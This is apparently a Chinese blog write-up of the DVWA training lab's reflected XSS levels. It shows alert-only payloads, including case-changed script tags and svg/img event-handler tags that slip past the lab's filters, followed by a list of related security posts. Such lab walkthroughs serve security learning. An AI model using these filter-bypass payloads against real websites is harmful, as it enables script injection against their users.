【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦

假客套2024-11-06 13:19

一、低级low

简单拿捏

复制代码 
<script>alert(123)</script>

二、中级middle

源码过滤了script但是没有过滤大小写,改成大写S

复制代码 
<Script>alert(123)</script>

三、高级high

比中级高,过滤了script并且以及大小写,使用其他标签,二选一就行

复制代码 
<svg onload=alert(123)>

<img src=x onerror=alert(123)>
相关推荐
买大橘子也用券29 分钟前
BUUCTF-[0CTF 2016]piapiapia-WP
web安全·网络安全
大方子35 分钟前
【青少年CTF S1·2026 公益赛】CallBack
网络安全·青少年ctf
大方子1 小时前
【无标题】
网络安全·青少年ctf
买大橘子也用券1 小时前
one_line_php-wp
web安全·网络安全·php
菩提小狗15 小时前
每日安全情报报告 · 2026-04-12
网络安全·漏洞·cve·安全情报·每日安全
pencek17 小时前
HakcMyVM-Quick3
网络安全
zjeweler18 小时前
“网安+护网”终极300多问题面试笔记-全
笔记·网络安全·面试·职场和发展
瘾大侠19 小时前
HTB - Silentium
安全·web安全·网络安全
网络安全许木20 小时前
自学渗透测试第14天(信息收集进阶与指纹识别)
linux·网络安全·渗透测试
视觉&物联智能1 天前
【杂谈】-洞察业务风险潜藏暗礁:影子人工智能如何重塑移动威胁格局
人工智能·网络安全·aigc·agi
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛03GitHub 镜像站点04基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南05免费!不限量!用opencode接入英伟达(NVIDIA)大模型,轻松打造你的 AI 编程助手06AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析07Oh My Codex 快速使用指南08CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南09从限购到畅通:GLM-5.1 Coding Plan接入攻略10LLM Wiki:让大模型替你打理知识库的完整指南